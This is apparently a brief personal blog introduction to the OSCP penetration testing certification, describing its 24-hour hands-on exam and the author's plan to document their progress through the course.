Certification information:
OSCP

The Offensive Security Certified Professional (OSCP) is the world’s first completely hands on offensive information security certification. The OSCP challenges the students to prove they have a clear practical understanding of the penetration testing process and lifecycle through an arduous twenty four (24) hour certification exam.

The OSCP exam consists of a dedicated vulnerable network, which is designed to be compromised within a 24-hour time period. The exam is entirely hands-on and is completed with the examinee submitting an in-depth penetration test report of the OSCP examination network and PWK labs. The coveted OSCP certification is awarded to students who successfully gain administrative access to systems on the vulnerable network.

Completing this course will allow me to validate my knowledge, as well as learn a lot more. This will be one of the toughest courses I have ever taken.

I am positive that I can complete this challenge and concur the exam.

I will do my best to update this fairly regularly to document my experiences and challenges while going through the course and the exam.